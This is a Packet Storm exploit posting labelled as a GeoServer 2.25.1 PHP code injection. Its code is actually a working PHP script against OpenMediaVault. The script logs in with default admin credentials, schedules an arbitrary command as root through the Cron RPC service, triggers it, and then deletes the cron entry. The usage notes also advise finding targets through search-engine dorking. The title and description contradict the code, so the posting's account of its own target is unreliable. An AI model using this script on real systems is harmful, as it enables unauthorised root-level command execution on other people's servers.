

GeoServer 2.25.1 Code Injection

GeoServer version 2.25.1 suffers from a PHP code injection vulnerability.

Packet Storm
=============================================================================================================================================| # Title     : GeoServer 2.25.1 Code Injection Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    :                                                                                               |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 118 set your target .[+] Line 123  set your command to execute.[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenMediaVaultExploit{    private $targetUri;    private $username;    private $password;    private $persistent;    private $cronUuid;    private $versionNumber;    public function __construct($targetUri, $username, $password, $persistent = false)    {        $this->targetUri = $targetUri;        $this->username = $username;        $this->password = $password;        $this->persistent = $persistent;    }    private function sendRequest($url, $data)    {        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json'        ]);        $response = curl_exec($ch);        curl_close($ch);        return json_decode($response, true);    }    public function login()    {        echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";        $data = [            'service' => 'Session',            'method' => 'login',            'params' => [                'username' => $this->username,                'password' => $this->password            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return isset($response['authenticated']) && $response['authenticated'] === true;    }    public function checkTarget()    {        echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";        $data = [            'service' => 'System',            'method' => 'getInformation',            'params' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return $response;    }    public function checkVersion($response)    {        if (!empty($response)) {            $version = $response['response']['version'] ?? null;            return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;        }        return null;    }    public function executeCommand($cmd)    {        echo "Executing command...\n";        $schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';        $uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';        $data = [            'service' => 'Cron',            'method' => 'set',            'params' => [                'uuid' => $uuid,                'enable' => true,                'execution' => 'exactly',                'minute' => $schedule,                'hour' => $schedule,                'dayofmonth' => $schedule,                'month' => $schedule,                'dayofweek' => $schedule,                'username' => 'root',                'command' => $cmd,                'sendemail' => false,                'comment' => '',                'type' => 'userdefined'            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        $this->cronUuid = $response['response']['uuid'] ?? '';        $this->applyConfigChanges();        echo "Cron payload execution triggered.\n";    }    public function applyConfigChanges()    {        $data = [            'service' => 'Config',            'method' => 'applyChangesBg',            'params' => [                'modules' => [],                'force' => false            ],            'options' => null        ];        $this->sendRequest($this->targetUri . '/rpc.php', $data);    }    public function removePayload()    {        if (!$this->persistent) {            $data = [                'service' => 'Cron',                'method' => 'delete',                'params' => [                    'uuid' => $this->cronUuid                ]            ];            $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);            if ($response) {                $this->applyConfigChanges();                echo "Cron payload entry successfully removed.\n";            } else {                echo "Cannot access cron services to remove payload.\n";            }        }    }}// Usage$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);if ($exploit->login()) {    $response = $exploit->checkTarget();    if ($response) {        $exploit->versionNumber = $exploit->checkVersion($response);        $exploit->executeCommand('your-command-here');        $exploit->removePayload();    }}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

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